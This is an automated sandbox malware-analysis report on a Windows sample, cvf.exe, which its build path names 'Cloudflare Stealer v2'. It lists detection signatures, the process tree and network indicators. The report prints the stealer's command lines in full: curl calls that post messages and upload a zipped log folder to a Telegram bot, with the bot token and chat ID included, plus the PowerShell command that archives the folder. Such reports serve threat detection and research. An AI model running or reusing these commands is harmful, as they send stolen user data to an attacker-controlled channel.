Windows Analysis Report
cvf.exe

Overview

General Information

Sample name: cvf.exe
Analysis ID: 1636485
MD5: 724d9557f66b00f2d74846e3e29434e6
SHA1: 7edbf247b9cb9881c1888c4feaaee5fcb3af0254
SHA256: cc681954f48230c5a451104f96273baaab0d30d800732af5a1cf4e1eaf49d719
Tags: exestrangeuser-banthisg

Detection

Score: 72
Range: 0 - 100
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Uses nslookup.exe to query domains
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cvf.exe (PID: 7716 cmdline: "C:\Users\user\Desktop\cvf.exe" MD5: 724D9557F66B00F2D74846E3E29434E6)
    • conhost.exe (PID: 7724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cvf.exe (PID: 7768 cmdline: cvf.exe MD5: 724D9557F66B00F2D74846E3E29434E6)
      • cmd.exe (PID: 7784 cmdline: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • nslookup.exe (PID: 7800 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: 9D2EB13476B126CB61B12CDD03C7DCA6)
        • findstr.exe (PID: 7808 cmdline: findstr Address MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • findstr.exe (PID: 7824 cmdline: findstr /V resolver1.opendns.com MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7848 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 7864 cmdline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 7940 cmdline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 8096 cmdline: C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • nslookup.exe (PID: 8112 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: 9D2EB13476B126CB61B12CDD03C7DCA6)
        • findstr.exe (PID: 8120 cmdline: findstr Address MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
        • findstr.exe (PID: 8136 cmdline: findstr /V resolver1.opendns.com MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 8160 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 8176 cmdline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 7292 cmdline: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 1832 cmdline: curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 7572 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 7732 cmdline: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 8096 cmdline: C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 6864 cmdline: curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
      • cmd.exe (PID: 8168 cmdline: C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • curl.exe (PID: 3876 cmdline: curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!" MD5: 44E5BAEEE864F1E9EDBE3986246AB37A)
  • cleanup
No configs have been found
No yara matches
Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json, CommandLine: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: cvf.exe, ParentImage: C:\Users\user\Desktop\cvf.exe, ParentProcessId: 7768, ParentProcessName: cvf.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json, ProcessId: 7848, ProcessName: cmd.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force", CommandLine: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7572, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force", ProcessId: 7732, ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-12T20:15:21.605870+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 149.154.167.220 | 443 | TCP
2025-03-12T20:15:24.769160+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49745 | 149.154.167.220 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-12T20:14:58.605223+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49723 | 149.154.167.220 | 443 | TCP
2025-03-12T20:15:02.180165+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49726 | 149.154.167.220 | 443 | TCP
2025-03-12T20:15:04.974956+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49731 | 149.154.167.220 | 443 | TCP
2025-03-12T20:15:08.056433+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.4 | 49735 | 149.154.167.220 | 443 | TCP


AV Detection

Source: cvf.exe | Virustotal: Detection: 15%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: cvf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: cvf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\Users\skar\Desktop\CloudflareStealer V2\Cloudflare Stealer v2\Release\Cloudflare Stealer v2.pdb9 source: cvf.exe
Source: Binary string: C:\Users\skar\Desktop\CloudflareStealer V2\Cloudflare Stealer v2\Release\Cloudflare Stealer v2.pdb source: cvf.exe
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BDE041 FindFirstFileExW,0_2_00BDE041
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BB22D0 Concurrency::cancel_current_task,FindFirstFileA,CopyFileA,FindNextFileA,CreateDirectoryA,GetLastError,FindClose,SHGetFolderPathA,0_2_00BB22D0
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BC77E6 FindClose,FindFirstFileExW,GetLastError,0_2_00BC77E6
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BC783D GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx,0_2_00BC783D

Networking

Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49726 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49735 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49723 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49742 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49731 -> 149.154.167.220:443
Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49745 -> 149.154.167.220:443
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: unknown | DNS query: name: api.telegram.org
Source: unknown | DNS query: name: api.telegram.org
Source: global traffic | TCP traffic: 192.168.2.4:60707 -> 162.159.36.2:53
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View | JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: resolver1.opendns.com
Source: global traffic | DNS traffic detected: DNS query: 222.222.67.208.in-addr.arpa
Source: global traffic | DNS traffic detected: DNS query: myip.opendns.com
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
Source: unknown | HTTP traffic detected: POST /bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage HTTP/1.1 | Host: api.telegram.org | User-Agent: curl/7.83.1 | Accept: */* | Content-Type: application/json | Content-Length: 399
Source: cvf.exe | String found in binary or memory: https://api.telegram.org/bot
Source: curl.exe, 00000020.00000002.1443059234.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH
Source: curl.exe, 00000020.00000002.1443059234.0000000002A53000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH%
Source: cvf.exe, 00000002.00000002.1443455821.0000000000D07000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE
Source: curl.exe, 00000020.00000002.1443059234.0000000002A40000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000020.00000003.1442886383.0000000002A50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument
Source: curl.exe, 0000001E.00000002.1414619345.00000000029B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument-Fchat_id=-47
Source: curl.exe, 00000020.00000002.1443059234.0000000002A40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument-Fchat_id=-Fd
Source: curl.exe, 00000013.00000002.1278161915.00000000031D0000.00000004.00000020.00020000.00000000.sdmp, ConDrv.2.dr | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage
Source: curl.exe, 00000008.00000002.1184435257.0000000002DD0000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1217555905.0000000003630000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000011.00000002.1245625646.0000000003070000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1278161915.00000000031D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage-HContent-Type
Source: curl.exe, 00000011.00000003.1245496882.0000000003080000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessageF
Source: curl.exe, 00000013.00000003.1277931569.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000002.1278161915.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000013.00000003.1277913522.00000000031E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessageapi.telegram.o
Source: cvf.exe, 00000002.00000002.1443455821.0000000000D07000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragEath
Source: cvf.exe | String found in binary or memory: https://api.telegram.org/botCaliforniaUnited
Source: cvf.exe | String found in binary or memory: https://api.telegram.org/botExecuting
Source: cvf.exe, READ_ME.txt.2.dr | String found in binary or memory: https://t.me/fakecloudflare
Source: cvf.exe | String found in binary or memory: https://t.me/fakecloudflareLog
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49723 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49726 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BB22D0 0_2_00BB22D0
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BCF26E 0_2_00BCF26E
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BE23E9 0_2_00BE23E9
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BD2570 0_2_00BD2570
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BB8680 0_2_00BB8680
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BB99A0 0_2_00BB99A0
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BDB94D 0_2_00BDB94D
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BE094D 0_2_00BE094D
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BBAC80 0_2_00BBAC80
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BBCCC0 0_2_00BBCCC0
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BCBDC0 0_2_00BCBDC0
Source: C:\Users\user\Desktop\cvf.exe | Code function: 0_2_00BC1E30 0_2_00BC1E30
Source: C:\Users\user\Desktop\cvf.exe | Code function: String function: 00BC9500 appears 62 times
Source: C:\Users\user\Desktop\cvf.exe | Code function: String function: 00BC41C0 appears 37 times
Source: cvf.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal72.troj.evad.winEXE@47/13@9/2
Source: C:\Users\user\Desktop\cvf.exe | File created: C:\Users\user\Desktop\firstrun.txt
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2f5tt03m.i5l.ps1
Source: cvf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\cvf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: cvf.exe | Virustotal: Detection: 15%
Source: unknown | Process created: C:\Users\user\Desktop\cvf.exe "C:\Users\user\Desktop\cvf.exe"
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Users\user\Desktop\cvf.exe cvf.exe
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr Address
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr Address
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Compress-Archive -Path 'C:\Users\user\Desktop\log\\*' -DestinationPath 'C:\Users\user\Desktop\log.zip' -Force"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=-4798834305" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\curl.exe curl -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendDocument" -F "chat_id=" -F "document=@C:\Users\user\Desktop\log.zip" -F "caption=New Log!"
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Users\user\Desktop\cvf.exe cvf.exe
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com resolver1.opendns.com | findstr Address | findstr /V resolver1.opendns.com
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
Source: C:\Users\user\Desktop\cvf.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c curl -s -X POST "https://api.telegram.org/bot8194646631:AAFjEFZ0QTQqIKRDV84msNAH0kuJf2QragE/sendMessage" -H "Content-Type: application/json" -d @temp_payload.json
